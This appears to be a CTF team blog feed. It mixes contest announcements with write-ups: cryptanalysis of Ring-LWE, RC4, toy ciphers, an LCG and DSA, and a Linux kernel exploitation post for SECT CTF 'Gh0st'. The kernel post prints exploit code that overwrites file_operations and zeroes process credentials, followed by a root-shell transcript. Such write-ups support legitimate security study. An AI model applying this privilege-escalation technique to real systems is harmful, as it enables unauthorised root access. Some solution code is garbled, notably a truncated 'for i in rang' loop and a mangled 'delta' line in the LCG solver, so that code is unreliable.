More Smoked Leet Chicken

CyBRICS 2020 Lite

vos — Mon, 20 Jul 2020 18:10:18 +0000

If you haven’t yet registered for our 2020 edition of CyBRICS CTF, you should.

Like previous year, it’s made by SPbCTF meetups crew (guys from MSLC / LC↯BC, SiBears, PeterPEN, Yozik), and we invite all teams to play.

Unlike previous year, this one is Lite — single online Jeopardy round, everyone is eligible, and you get prizes without playing Attack-Defense! (which is rare nowadays)

The same great set of 28 challenges ranging from easy pen-and-paper to interesting for 24 hours of gameplay. Noobies will have a taste of what CTFs are, skilled will have fun and check if they can pwn everything the fastest, competing for the prizes.

Registration open: now
Game is live: July 25th, 2020 10:00 UTC
Game ends: July 26th, 2020 10:00 UTC (24 hours)

Sign up: https://cybrics.net/ (CTFtime page)

Prizes:
1st place: 3 000 USD
2nd place: 2 000 USD
3rd place: 1 000 USD

Additionally, we have a special prize from XCTF League: 1st place gets a spot in the traditional XCTF Finals 2020 in China, where teams get qualified by winning other contests.

On top of that, Top-3 teams each get 5 tickets to Positive Hack Days and to OFFZONE international infosec conventions in Moscow (what are those)

So in just a few words: Online-only, open to all. 28 good old Jeopardy tasks. July 25th.

PwnThyBytes CTF 2019 – Wrong Ring (Crypto)

hellman — Mon, 30 Sep 2019 05:53:54 +0000

Is post quantum cryptography too complex for you?

wrong_ring.sage

Summary: Ring-LWE with small error, hidden under a number field

Let us look at the main part:

prime = 1487
degree = 256
q = x^256 + prime - 1
N = PolynomialRing(RationalField(100)).quo(q)
roots = q.roots(CC) # in particular order
for i in range(nr_samples):
  a = random_vector_mod(prime, degree)
  a_coeff = vec2poly(a)
  
  a_canonical = coeff_to_canonical(a_coeff, roots)
  out.write('a_'+str(i)+' is '+str(a_canonical)+'\n')

  err_coeff = generate_error(sigma, prime, degree)
  b_coeff_interm = N(a_coeff * sec_coeff + err_coeff)
  b_coeff = 0
  for j in range(degree):
    b_coeff = b_coeff + \
      x^j*reduction_mod(b_coeff_interm.list()[j],prime)
  
  b_canonical = coeff_to_canonical(b_coeff, roots)
  out.write('b_'+str(i)+' is '+str(b_canonical)+'\n')

Let $p = 1487$. Note that $a(x)$ and $s(x)$ are polynomials over $GF(p)$. However, the error polynomial $e(x)$ (given by err_coef) has real coefficients. Moreover, the function coeff_to_canonical evaluates its polynomial argument at the complex roots of the ring-defining polynomial $q(x)$. We are given 8 samples of $a(x)$ and $b(x)$ given in this form.

The high-level setting is basically a Ring-LWE scheme. The ring is $GF(p)[x]/(x^{256}-1)$), that is, polynomials are reduced by the rule $x^{256}=1$ and coefficients are reduced modulo $p$. This is very intuitive: multiplying a polynomial by $x$ simply rotates its vector of coefficients to the left.

$s(x)$ is a secret polynomial in the ring: after recovering it we can decrypt the jpeg image and read the flag. We get 8 samples of the form $a_i,b_i$, such that $b_i(x) = a_i(x)s(x)+e_i(x)$, where $a_i(x)$ is a random polynomial over $GF(p)$ and $e_i(x)$ is a vector with ‘small’ but also fractional coefficients.

Recall that we don’t get exactly the coefficients of $a_i, b_i$. Instead, we get evaluations of these polynomials at the complex roots of the polynomial $q(x)=x^{256}+p-1$, which are represented as high-precision float numbers. However, we can recover the polynomials rather precisely using the interpolation. Note that the matrix Sigma defined in the code corresponds exactly to evaluation of a polynomial on the aforementioned roots. Therefore, its inverse matrix Sigma_inv corresponds exactly to the interpolation with respect to those roots. Therefore, we can recover the polynomials $a_i(x),b_i(x)$ by multiplying the generated vectors by Sigma_inv. The precision is enough to recover $a_i$ precisely, since it has integer coefficients (i.e., we simply round the coefficients to nearest integers). However, due to the added error, $b_i(x)$ is not integral and we have to look at the magnitute of the error polynomial $e(x)$, which is generated in a very special way.

def generate_error(sigma, prime, degree):
    D = RealDistribution('gaussian',sigma)
    error = []
    for i in range(degree):
        error.append(D.get_random_element())
        error = vector(error).column()
    # U = 1//sqrt(2) * matrix([[1, i], [1, -i]])
    error_canonical = U * error
    error_coeff = []
    error_coeff_interm = Sigma_Inv * error_canonical
    for i in rang
        error_coeff += [error_coeff_interm[i][0].real()]
    error_coeff = vec2poly(error_coeff)
    return error_coeff

First, a vector of 256 values is sampled using Gaussian distribuiton with sigma = 1000 (average absolute value is about 800, which is rather high). Let $r_0$ and $r_1$ be its two halves respectively. Then multiplication with matrix $U$ is performed, which results in $r’ = (r_0 + ir_1 || r_0 – ir_1)$, i.e. the second half is the complex conjugate of the first half. Then, this vector is treated as the vector of values of a polynomial $e(x)$ taken on the complex roots of the polynomial $x^{256}+p-1$, which are ordered exactly such that the second half of the roots is the complex conjugate of the first half of the roots (note that all roots come in conjugate pairs). Finally, the vector $r’$ is interpolated to obtain the polynomial $e(x)$. This is done by multiplying $r’$ by the Sigma_inv matrix. The polynomial $e(x)$ is then used in the Ring-LWE scheme described above.

I haven’t figured yet a precise explanation, but it turns out that the resulting scheme of generating $e(x)$ generates polynomial with much smaller coefficients than expected. (See UPD1). In particular, the least significant coefficients have an average absolute value of about 30, and the most significant coefficients are actually much smaller than 1! As a result, we can recover precisely several top coefficients of $a_i(x)s(x) = b_i(x)-e_i(x)$ by rounding $b_i(x)$, similarly to $a_i(x)$! Each such coefficient gives us a linear relation on $s(x)$ with coefficients defined by $a(x)$. Since we have 8 samples and $s(x)$ has 256 coefficients, we need to obtain at least 32 most significant coefficients of each $b_i(x)$. Experimentally we can verify that we can safely obtain these coefficients by rounding. By taking 33 equations, we can ensure that the system is overdefined and a wrong solution is not likely to pass.

Here is the pretty simple solution code (put the values from challenge.txt in the arrays $a$ and $b$):

T = 33
t = []
eqs = []
for i in xrange(8):
    # interpolate a_i and b_i and round
    avec = [round(v.real()) for v in Sigma_Inv * a[i]]
    bvec = [round(v.real()) for v in Sigma_Inv * b[i]]

    # generate matrix of multiplication by a_i(x)
    # recall that mult. by x
    # is simply rotation in our ring
    # thus we simply fill diagonals
    m = matrix(GF(prime), 256, 256)
    for ia, va in enumerate(avec):
        for j in xrange(256):
            m[(ia+j) % 256,j] = va

    # take the most significant T coefficients
    # as linear equations
    eqs.extend(list(m[-T:]))
    t.extend(list(bvec[-T:]))

m = matrix(GF(1487), eqs)
t = vector(GF(1487), t)

sol = m.solve_right(t)
print("sol", sol)

UPD1: The challenge author pointed me the relevant paper with explanations about the norms and the attack: Provably Weak Instances of Ring-LWE revisited (Wouter Castryck et al.)

1st Crypto CTF 2019 – Least Solved Challenges

hellman — Sun, 11 Aug 2019 17:50:24 +0000

Brief solution ideas to the least solved Crypto CTF challenges.

Midnight Moon

We can see that the primes are generated as follows. Let $m$ be the right half of the flag (as an integer) and $l$ be its byte length. We repeat the transformation $m \mapsto ((m+1)\cdot l)\oplus l$ until $m$ is prime. This is the first prime $p$. Then we set $m = (2m+1)$ and repeat the first transformation until we get another prime. As a result, the second prime $q$ is approximately equal to $2 l^e p$, where $e$ is the number of iterations in the last process. We can guess $e$ and $l$ (note that $e$ is upper bounded by $log_l n$) and then apply the Fermat factorization method to the number $2 l^e n = 2 l^e p q$. It should work since $2 l^e p \approx q$. Since $e$ can vary a lot, we can only hope that the approximation is good enough. However, there is a little subtlety with the Fermat method. It works only if both close factors have the same parity, which is not the case: $2l^e p$ is even and $q$ is odd. This of course can be easily overcome by multiplying the number by $4$, which corresponds to multiplying both close factors by 2.

In the challenge the modulus can be factored with $l=27$ and $e=442$. The next step is to guess the number of applications of the transformation $m \mapsto ((m+1)\cdot l)\oplus l$ when going from initial $m$ to the first prime $p$. After trivial inversion of the transformation, we obtain the right half of the flag: “4D3_1n__m1dNi9hT_witH_L0v3!}”. We could study the encryption function to decrypt the first half, but we can already guess the whole flag: “CCTF{M4D3_1n__m1dNi9hT_witH_L0v3!}”, which is correct.

Starving Parrot

The primes are generated by taking two random values and applying some fixed unknown polynomial to them. Once the two values are primes, the process is finished. Since we have access to the polynomial, we can easily recover it, for example by putting 10000000000000000000000000000000 as input we can clearly see the output 100…003700..002019. The polynomial is trivially deduced: $x^{13} + 37x+2019$. It follows that
$$n = (r^{13} + 37r+2019) \cdot (s^{13} + 37s+2019)$$
for some $r,s$ of size roughly 55 bits. Observe that $\sqrt[13]{n}$ provides a good approximation of $rs$. In fact, in the given setting $\lfloor \sqrt[13]{n} \rfloor = rs$. This number has 108 bits and can be easily factored:
$$\begin{multline*}251970989651144357978582196759904 = 2^5 \cdot 11 \cdot 13^2 \cdot 61 \cdot 239 \cdot 491\cdot\\ \cdot 3433 \cdot 137383 \cdot 1254599604823.\end{multline*}$$
This number has 2304 divisors in total. Each divisor gives a candidate for $r$ and its complement is a candidate for $s$. By applying the polynomial to them, we can obtain potential prime factors and check if they result in the same modulus. In the challenge we obtain
$$\begin{align*}r &= 30132816491977336,\\ s &= 15416171199104228.\end{align*}$$
Given the factorization, we can easily decrypt the message (don’t forget to invert the operations applied to the message before squaring):

“CCTF{it5____Williams____ImprOv3d_M2_Crypt0yst3m!!!}”.

Oliver Twist

We can recognize the (twisted) Edwards curve addition formulas:
$$\begin{align*}
x_3 &\equiv (x_1 y_2 + y_1 x_2) / (1 + d x_1 x_2 y_1 y_2)\pmod{p},\\
y_3 &\equiv (y_1 y_2 – a x_1 x_2) / (1 – d x_1 x_2 y_1 y_2) \pmod{p}.
\end{align*}$$
In our case $a=3$ and $d=2$. You can learn a bit about twisted Edwards curves for example from slides by Christiane Peters. We are given $y$-coordinate of a point that was generated from the flag in a particular way. In order to find the $x$ coordinate, we have to plug the $y$ coordinate into the curve equation and solve for $x$:
$$3x^2 + y^2 – 2x^2y^2-1\equiv 0 \pmod{p}.$$
This is a quadratic equation in $x$ and we can easily find both roots. One of them is significantly smaller than $p$, so we can assume that this is the one we are looking for. This point $(x,y)$ is obtained from doubling the point $(m’, y)$ $(m’ \mod 3)$ times, where $m’$ is generated from the flag. Since we found a small $x$, we can guess that $m’ \mod 3 = 0$ and no squarings occured and that $x = m’$. Now, $m’$ is generated from the flag $m$ by adding $\sum_{i=1}^t 2^i + 3i$ to it for some small integer $t \ge 313$. We guess $t$ and subtract the added terms. We obtain for $t=313$ the flag:

“CCTF{N3w_But_3a5Y_Twisted_Edwards_curv3_Crypt0sys7em}”.

CyBRICS CTF 2019 — we’re making a full-fledged one!

vos — Sat, 13 Jul 2019 18:26:55 +0000

We, in SPbCTF meetups crew (guys from LC↯BC, SiBears, PeterPEN, Yozik), were invited to make a CTF together with some BRICS countries universities.

So we made one — and invite everyone to compete, have fun and win some prizes in CyBRICS CTF 2019. This one continues the tradition of hack you events, but this time it won’t be individual. Teams are welcome.

28 challenges ranging from easy pen-and-paper to interesting. Noobies will have a taste of what CTFs are, skilled will have fun and check if they can pwn everything the fastest, academic teams will compete for 10 000 USD first place prize.

Registration open: now
Game is live: July 20th, 2019 10:00 UTC
Game ends: July 21st, 2019 10:00 UTC (24 hours)

Sign up: https://cybrics.net/ (CTFtime page)

Quals Prizes:
Top-5 academic teams from each BRICS country are invited to the on-site Attack-Defense Finals in St. Petersburg
Top-1 team in Quals gets a spot in XCTF Finals 2019 (September, China).

Finals Prizes:
1st place: 10 000 USD
2nd place: 5 000 USD
3rd place: 3 000 USD

So in just a few words: New CTF by us. 28 good old Jeopardy tasks. July 20th.

SECT CTF 2018 :: Gh0st

blackzert — Fri, 14 Sep 2018 16:39:50 +0000

Original Description:

Gh0st – Pwn (468)

Yikes, one of our finest cyberwarrior plugged into the wrong system. His mind is stuck in the kernel. Bring a plunger and your finest kernel exploit Service: nc 142.93.38.98 6666 | nc pwn.sect.ctf.rocks 6666 Download: gh0st.tar.gz Author: likvidera

Summary: linux kernel exploitation using an out-of-bounds kernel memory write.

Analysis

So here we have a kernel image with initrd image which contains gh0st.ko kernel module. After a short reversing we see this module creates ‘/dev/gh0st’ file and handles file operations on it.

Most interesting here are dev_ioctl function which handles ioctl to that device. It introduces two commands:

#define WRITE_BF 0x1337B4B3
#define EXECUTE_BF 0xAC1DC0DE

First one used to write a program in to a static buffer variable called ‘bytecode’ that keeps it for a second syscall. At the same time it verifies that the program consists only of allowed operations:

do {
    v8 = bytecode.code[index];
    if ( !v8 )
        break;
    v9 = v8 - 0x2B;
    if ( v9 > 50u ) {
        is_valid = 0;
    } else if ( !((0x50000000A000FuLL >> v9) & 1) ) {
        is_valid = 0;
    }
    ++index;
} while ( index != 1048 );
error_msg = "\x016Invalid bf";
if ( !is_valid )
    goto fail;

which allows following symbols in the program: #define alpha "+,-.<>[]"

Here is the meaning of them:
'+' , '>' inc stack ptr '-', '<' dec stack ptr ',' get gap_in[gap_pos_in++] and put it to stack '.' get symbol from stack, put it to gap_out[gap_pos_out++]

and it is important to look at the structure of program context:

struct bf_format {
    char header[4];
    int stack_size;
    char gap_in[256];
    char gap_out[256];
    char code[1048];
};

The stack pointer is allocated with kmalloc(size, GFP_KERNEL) and freed when program is executed. We can change pointer with + and – and write out of bounds of allocated buffer.

Allocator

Now its a good time to see what allocator is used by this kernel. Just using gdb and gdb.cmd from the original task archive we can load symbols. If we break at kmalloc and trace a bit we will see the kernel uses SLOB allocator. This allocator contains three different lists – small list chunks (less than 256 bytes), medium (less than 1024) and large (less than 4096). Any allocation of bigger size will be allocated with page allocator. To do something useful with our primitive we should place some interesting objects near our buffer and overwrite them. The easiest way is to try to overwrite ‘struct file’ since it has ‘file_operations’ pointer to functions that handle file operations.

After hours of experiments ;) following code was stable:

for( j =0; j < 200; ++j)
    open("./exploit", O_RDONLY);
corrupt();

Here function 'corrupt' overwrites next object after one allocated as our stack. The size of stack chosen is 32 bytes.

Now, we know that the kernel has KASLR and SMEP/SMAP disabled. So we may overwrite fileoperations with our own user-mode array with a pointer to function to change creds:

unsigned long mign_buffer[1024/8] = {0};
mign_buffer[2] = &hack;
*(unsigned long*)(&bf->gap_in) = (unsigned long)&mign_buffer;
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
inc_stack_ptr();
write_stack_ptr();

mign_buffer[2] is offset of read operation inside file_operations structure. inc_stack_ptr is 8× '+' and write_stack_ptr is 8× ',+'

The hack function supposed to set uid = 0 in current_task->cred and fix file-opreations back to romfs_fileoperations, We get this address from symbols.

void hack(char *file) {
    char * current_task = (char*)*(unsigned long *)0xffffffff81839040;
    char * cred = (char*)*(unsigned long*)(current_task + 0x3c0); // offset of cred
    for (unsigned int k = 4; k < 0x24; ++k)
        cred[k] = 0; // zero all *id in creds
    //print("hack happend!\n");
    *(unsigned long *)(file + 0x28) = 0xffffffff81616e40; // fix fops
    // 0xffffffff81616e40
    j = 10000;
    return;
}

Since we used read call in cycle, we should probably stop it by setting j = 10000;

call execve after all and we are done.

[+] sending bytes: 3048
[+] 3048 of 3048 transferred
[*] Switching to interactive mode
./exploit
1337
we r00t
/bin/sh: can't access tty; job control turned off
/home/ctf # id
id
uid=0(root) gid=0(root) groups=1337(ctf)
/home/ctf # cat flag
cat flag
SECT{k3rn3l_ex0rc1sm}

/home/ctf #

Exploit is written without libc-stuff to make it smaller and make uploading easier.

All the sources are here: expl

Midnight CTF 2018 Finals – Snurre128

hellman — Wed, 27 Jun 2018 16:30:47 +0000

In this challenge we have a stream cipher based on LFSR and nonlinear filtering function. It has 128-bit LFSR secret state and we are also given 1600 keystream bits. Our goal is simply to recover the key which is the initial state. Here is the nonlinear filtering function:

f(v) =
v[0] ^ v[1] ^ v[2] ^ v[31] ^ 
v[1]&v[2]&v[3]&v[64]&v[123] ^ 
v[25]&v[31]&v[32]&v[126]

We can see that the two nonlinear terms are products of 4 and 5 variables. With high probability these terms are equal to zero and the filtering function becomes linear. More precisely, define

L(v) = v[0] ^ v[1] ^ v[2] ^ v[31]

Then the probability $p$ that $f(v) = L(v)$ equals to $15/16 \times 31/32 + 1/16 \times 1/32 = 233/256$. Moreover, for 128 keystream bits the approximation can be expected to hold with probability $p^{128} \approx 2^{-17.384}$ or roughly $1/171000$. That is, if we sample 128 keystream bits roughly 171000 times we can expect that once they all are filtered using the linear function $L$. Then we can solve the (noiseless) linear system and recover the key. We can sample bits from the 1600-bit keystream since we expect that roughly $233/256\times 1600$ of them are filtered using the linear function and we will succeed once we choose 128 bits out of them. We just need to know the linear function that maps the original key to each of output keystream bits (i.e. repeated LFSR step and linear filtering). This can be done simply by running Snurre with linear filtering function on keys with single bit set (i.e. basis vectors) and putting the resulting streams into columns of a matrix.

The solution may take some time, e.g. around 1 hour on a common laptop. But it can be easily parallelized simply by running multiple instances.

Solution code in Sage

The problem of solving noisy linear equations is called Learning Parity with Noise (LPN). There are various methods for approaching it. A good recent paper on this topic is “LPN Decoded” by Esser et al. For example, the described above method is called Pooled Gauss in the paper.

0CTF 2018 Quals – zer0C5 (Crypto 785)

hellman — Mon, 02 Apr 2018 14:28:42 +0000

0ops Cipher 4, hope you enjoy it:)
zer0C4.zip
nc 202.120.7.220 1234

Summary: related-key attack on weakened variant of RC4

In this challenge we have a weakened version of RC4. It operations on permutation of values $0\ldots 31$. Moreover, $i$ is incremented in the beginning of the loop instead of the end.

We are given access to a related-key oracle. We can send any key delta and the server will return us the generated sequence using the key xored with our delta.
There is a well known paper “Weaknesses in the Key Scheduling Algorithm of RC4.” by Fluhrer, Mantin, Shamir. In Section 8 they describe a Related Key attack. And it actually works better if the key schedule is modified exactly as in the challenge.

The main idea is that we can recover the 16-byte key in layer of 16 bits, from LSBs of each key byte to MSBs. If LSBits of the key bytes form a special pattern, then the LSBits of the output sequence correlate with a special sequence.

It is slightly difficult because we have only 1500 queries of 512 deltas, that is $2^{19.5}$ deltas total. We can recover 4 LSBits of each key byte and then bruteforce the 16 MSBits locally.

With a good probability we get the key.

Full solution: https://gist.github.com/hellman/3faeb41275fb013407b503d69f332207

The flag: flag{Haha~~Do_y0u_3nj0y_ouR_stre4m_c1pher?}

0CTF 2018 Quals – zer0SPN (Crypto 550)

hellman — Mon, 02 Apr 2018 14:04:24 +0000

0ops SPN, hope you enjoy it:)
zer0SPN.zip

Summary: linear cryptanalysis on toy block cipher

In the challenge we have a “toy block cipher”. It is an SPN cipher with:

4 rounds
eight 8-bit S-Boxes (64-bit block)
bit permutations as linear layer

We are given $2^{16}$ random plaintext/ciphertext pairs.

On contrast with the zer0TC challenge, the bit permutation is strong and provides full diffusion. The S-Box is weak both differentially and linearly. Since we have known plaintexts, the way to go is linear cryptanalysis.

We shall attack the first round in order to get the master key and avoid need of key-schedule reversal. First, we need to find good 3-round linear trails. This can be done using various algorithms/tools.

For example:
Masks after first round: [ 64, 0, 0, 0, 0, 0, 0, 0],
Masks on ciphertexts: [242, 0, 0, 0, 0, 0, 242, 0],
Bias: $2^{-5.675513}$

We need to have bias $>2^{-8}$ because we have $2^{16}$ data. It actually is easier if the bias is around $2^{-6}$, then the right key byte will be the top candidate in our list with high probability.

The attack procedure:
1. Guess the first key byte $k$ of the master key
2. Partially encrypt the first byte of all plaintexts: $x’ = S(x^k)$.
3. Compute linear product: $c = scalar(x’, mask)$
4. Compute the bias of all c (i.e. how dis-balanced is the distribution of 0/1).
The right key byte should be in the top candidates sorted by the bias.

After we recover a couple of key bytes, we can use linear trails which have more active S-Boxes in the first round. The constraint is only that we have to guess only one extra key byte each time.

Full solution: https://gist.github.com/hellman/4950bff09b615e613d46be9eed4bc414

Finally, we get the flag: flag{48667ec1a5fb3383}

0CTF 2018 Quals – zer0TC (Crypto 916)

hellman — Mon, 02 Apr 2018 13:34:43 +0000

0ops Toy Cipher, hope you enjoy it:)
zer0TC.zip

Summary: meet-in-the-middle and key-schedule constraints

In the challenge we have a “toy block cipher”. It is an SPN cipher with:

5 rounds
8 8-bit S-Boxes (64-bit block)
bit permutations as linear layer

The bit permutation is weak: it maps 7 output bits of one S-box to 7 input bits of some S-Box in the next round. Still, 1 extra bit comes to each S-Box input. We can think about it as random/noise. The cipher then splits into 8 chains of 6 S-Boxes with key additions
and bit permutations between the S-Boxes (and extra “noisy” bits coming in).

We can attack each chain separately first, using meet-in-the-middle:
The first half requires us to guess 3 keys and 1 extra incoming bit per each plaintext.
The second half requires us to guess 3 keys and 2 extra incoming bits per each plaintext.

Using 3 pairs of pt/ct, we get:
$(2^{24} 2^3)(2^{24} 2^6)$ total guesses / $2^{24}$ filtering in the middle.
As a result, we get $2^{33}$ valid guesses using $2^{30}$ time (each valid guess corresponds to key + extra bits, so we will actually have less unique keys).

We then can use other 5 pairs of pt/ct to reduce the number of key candidates to
$(2^{48} * 2^{32})$ total guesses / $2^{64}$ filtering = $2^{16}$ valid guesses.
Again, the number of unique keys will be less (in fact it is around $3500 < 2^{12}$).

As a result, we still have lots of key candidates $(2^{12})^8 = 2^{96}$ total. Even more than $2^{64}$ actual keys. Now we have to use the key schedule to match the candidates correctly and efficiently.

The key schedule is AES-like. As it is difficult to find all useful places in key schedule by hand, we generate all byte equations from the key schedule and then choose and use them automatically.

Full solution: https://gist.github.com/hellman/10206114e790fd3e8d92b41209ac8381

The flag: flag{7e035ed7c2bc78c3}

hack you ’17 :: easy CTF on Oct 8—14

vos — Thu, 05 Oct 2017 20:09:59 +0000

As a tradition, every fall we host a fun lightweight Jeopardy CTF for our freshmen to attract them into all the CTFey goodness. This one will be our fifth year (holy shit!)

We invite everyone to check out hack you ’17 this year. Just as always, two separate scoreboards: one for SPbCTF meetups, one for everyone on the world. And yeah, we have some prizes this year!

28 challenges ranging from easy pen-and-paper to interesting. Noobies will have a taste of what CTFs are, skilled will have fun and check if they can pwn everything the fastest.

Registration open: now (sign up individually — no teams)
Game is live: October 8th, 2017 18:00 UTC
Game ends: October 14th, 2017 18:00 UTC

Sign up: https://hackyou.ctf.su/

Prizes:
Top-3 in the Overall board get a free ZeroNights 2017 entry each.
Top-50 in the Overall scoreboard qualify to the Final event in Saint Petersburg on October 29th.

So in just a few words: Fifth hack you. 28 good old speedhack tasks. October 8th.

TWCTF 2017 – Solutions for BabyPinhole, Liar’s Trap, Palindrome Pairs Challenge

hellman — Mon, 04 Sep 2017 10:03:55 +0000

Scripts with short explanations:

BabyPinhole (crypto 163)
Liar’s Trap (crypto/ppc 281)
Palindrome Pairs – Challenge Phase (ppc 63+337)

Polictf 2017 – Lucky Consecutive Guessing (Crypto)

hellman — Sun, 09 Jul 2017 09:08:37 +0000

We implemented a random number generator. We’ve heard that rand()’s 32 bit seeds can be easily cracked, so we stayed on the safe side.

nc lucky.chall.polictf.it 31337

chall.py

Summary: breaking truncated-to-MSB LCG with top-down bit-by-bit search.

In this challenge we have an LCG generator. We can query it up to 10 times and then we have to predict the correct value more than 100 times. So we have to recover the state from the 10 outputs.

self.a = 0x66e158441b6995
self.b = 0xB
self.nbits = 85    # should be enough to prevent bruteforcing

def nextint(self):
    self.state = ((self.a * self.state) + self.b) % (1 << self.nbits)
    return self.state >> (self.nbits - 32)

Interesting that the modulus is $2^{85}$ and this is a weak point: the diffusion between different bits is limited. More precisely, high bits will never affect low bits. But the problem is that the LCG outputs $32$ highest bits, and these bits depend both on low and high bits.

At the beginning we have no information about the state at all. After one output we know $32$ bits of the state. So, it is better to start attacking the second output and the effective unknown state size is $53$ bits.

Let’s analyze how the two parts of the state interact. To do this, we represent states and coefficients in the form

$$s=2^{53}s_1+s_0, ~\text{where}~ s_0 < 2^{53}.$$ That is, $s_1$ are the $32$ highest bits of $s$, $s_0$ are the $53$ lowest bits of $s$. Consider the step: $$ \begin{align} s' &= (a \cdot s+b) \mod{2^{85}} = \\ &= \bigg((2^{53}a_1 + a_0) (2^{53}s_1 + s_0) + b\bigg) \mod {2^{85}} \\ &= 2^{53}\bigg(s_1a_0 + s_0a_1 + \bigg\lfloor \frac{s_0a_0+b}{2^{53}} \bigg\rfloor\bigg ) \mod{2^{85}} + (s_0a_0+b) \mod{2^{53}}. \end{align} $$ Note that we observe the high part: $$out = \bigg(s_1a_0 + s_0a_1 + \bigg\lfloor \frac{s_0a_0+b}{2^{53}} \bigg\rfloor \bigg) \mod{2^{32}}.$$ We know $s_1a_0$. Note that in the challenge $a=\mathtt{0x66e158441b6995}$ with $a_1=3, a_0=\mathtt{0x6e158441b6995}$. Due to small $a_1$, the highest bits of $s_0a_1$ do not depend strongly on the lowest bits of $s_0$. Moreover, this is true in the floored fraction as well. To analyze this properly, let's split $s_0$ as $$s_0 = 2^t h+l, ~\text{for}~ l < 2^t ~\text{and some}~ t.$$ From now on we consider everything $\mod{2^{32}}$. The idea is that $h$ are some highest bits of $s_0$. We guess them and then we will try to check our guess. $$out - s_1a_0 = (2^th+l)a_1 + \bigg\lfloor \frac{(2^th+l)a_0+b}{2^{53}} \bigg\rfloor.$$ Note that in the challenge $b=11$ and it very rarely affects the flooring, so we can omit it. We can also split the fraction into two summands and the result will decrease by at most one: $$out - s_1a_0 = 2^th\cdot a_1+l\cdot a_1 + \bigg\lfloor \frac{2^th\cdot a_0}{2^{53}} \bigg\rfloor + \bigg\lfloor \frac{l\cdot a_0}{2^{53}} \bigg\rfloor \stackrel{?}{+} 1.$$ $$out - s_1a_0 - 2^th\cdot a_1 - \bigg\lfloor \frac{2^th\cdot a_0}{2^{53}} \bigg\rfloor = l\cdot a_1 + \bigg\lfloor \frac{l\cdot a_0}{2^{53}} \bigg\rfloor \stackrel{?}{+} 1.$$ Note that $a_0 < 2^{53}$ and also recall that $a_1 = 3$: $$out - s_1a_0 - 2^th\cdot a_1 - \bigg\lfloor \frac{2^th\cdot a_0}{2^{53}} \bigg\rfloor \le l\cdot (a_1+1) < 2^t\cdot4.$$ Once we guess $h$ for small enough $t$, we can compute the left part of this inequality and check the bound. Note that we must be careful with modulo $2^{32}$. Since the right half is smaller than the modulus, we can compute the left half modulo $2^{32}$ and check the inequality.

What $t$ should we choose? Since the left half is bounded by $2^{32}$, we want the right half to be restrictive. For example, $t=29$ has filtering power of around $1/2$. To get to $t=29$ we need to bruteforce $53-29=24$ highest bits of $s_0$. After that the number of candidates will decrease quickly.

With $pypy$ this quite short solution works for ~2 minutes which is longer than allowed by the challenge, but if we try just a few times we have high chances to recover the state in the allowed timespan.

gist

#-*- coding:utf-8 -*-

import random

class LinearCongruentialGenerator:
    def __init__(self, a, b, nbits):
        self.a = a
        self.b = b
        self.nbits = nbits
        self.state = random.randint(0, 1 << nbits)

    def nextint(self):
        self.state = ((self.a * self.state) + self.b) % (1 << self.nbits)
        return self.state >> (self.nbits - 32)

def split(x):
    return ((x >> 53) % 2**32, x % 2**53 )

MASK32 = 2**32-1
MASK53 = 2**53-1
MASK85 = 2**85-1

a = 0x66e158441b6995
b = 0xB
a1, a0 = split(a)

generator = LinearCongruentialGenerator(a, b, 85)

n1 = generator.nextint()
SECRET_STATE1 = generator.state
n2 = generator.nextint()
n3 = generator.nextint()

def recurse(h, t):
    if t == 0:
        # Final check of the candidate
        s = (s1 << 53) | h
        s = (a*s + b) & MASK85
        if s >> 53 != n2:
            return
        s = (a*s + b) & MASK85
        if s >> 53 != n3:
            return
        print "CORRECT!", h
        return h

    t -= 1
    h <<= 1
    for bit in xrange(2):
        h |= bit

        # delta = val - ( 2**t*h*a1 + 2**t*h*a0/2**53 ) % 2**32
        delta = val - ( (h+h+h<>53) )
        delta &= MASK32
        if delta < 4*2**t:
            res = recurse(h, t)
            if res:
                return res

# s1, s0 = split(SECRET_STATE1)

s1 = n1
out = n2
val = (out - s1*a0) % 2**32

for top in xrange(2**24):
    if top & 0xffff == 0:
        print hex(top)
    # top = s0 >> 29
    s0 = recurse(top, 29)
    if s0:
        print "Found solution!", s0
        break

mygen = LinearCongruentialGenerator(a, b, 85)
mygen.state = (s1 << 53) | s0
assert mygen.nextint() == n2
assert mygen.nextint() == n3
for i in xrange(1000):
    assert mygen.nextint() == generator.nextint()
print "Outputs predicted correctly"

The flag: flag{LCG_1s_m0re_brok3n_th4n_you_th!nk}

UPD: Thanks to Niklas for pointing out that this can be solved straightforwardly by Mathematica.

Google CTF 2017 Quals – BLT (Bleichenbacher’s Lattice Task – Insanity Check)

hellman — Mon, 19 Jun 2017 08:39:32 +0000

A slow descent into the dark, into madness, futility, and despair.

BLT.jar (not necessary)
STDOUT
Flag.java

Summary: DSA with short secrets, lattice + meet-in-the-middle attack.

In this challenge we are given a jar file, a java source code and an output file. Jar file contains several pictures, heavily hinting to lattices (and maybe to something else?). As we will see, Flag.java and STDOUT are enough to solve the challenge.

The java program performs a DSA signature with random private and ephemeral keys. The output is given and our goal is to recover the private key. The scheme indeed looks like proper DSA and is hard to break. However, if you run the program with random parameters, you can notice that the private keys generated are much smaller than they should be. At first I thought the Flag.class file was backdoored, but it turned out to be a quite funny bug in the java code. Consider the random generating function:

// Generate a random integer in the range 1 .. q-1.
private static BigInteger generateSecret(BigInteger q) {
  // Get the number of bits of q.
  int qBits = q.bitCount();

  SecureRandom rand = new SecureRandom();
  while (true) {
    BigInteger x = new BigInteger(qBits, rand);
    if (x.compareTo(BigInteger.ZERO) == 1 && x.compareTo(q) == -1) {
      return x;
    }
  }
}

Seems legit? Until you read that the BigInteger.bitCount method actually returns the Hamming Weight, not the bit size of the number! The Hamming Weight of a random prime is twice as smaller: $q$ is 256 bits and the secret keys will be roughly of size 128. This would be relatively easy, so the author decided to use $q$ with Hamming Weight 150!

Here are details of the scheme:

$p$ is 2048-bit prime, $g$ is an element of order $q$ mod $p$ ($q$ is 256-bit prime).
$x$ is a 256-bit private key, $y=g^x \mod p$ is a 2048-bit public key.
To sign a message $m$:
- generate an ephemeral 256-bit key $k$;
- compute $r = g^k \mod p \mod q$;
- compute $s = (h(m) + xr)/k \mod q$;
- $(r,s)$ is the signature.

The unknowns are $x$ and $k$. Due to the bug/backdoor, they are of size 150 bits instead of 256. In such cases the lattices come to mind, since they are often used to find small solutions to various equations.

One interesting equation we have is

$$sk \equiv h(m) + xr \pmod{q}.$$

The following I found in some paper about attacking DSA but currently I lost the paper. Let’s make the equation monic in one variable:

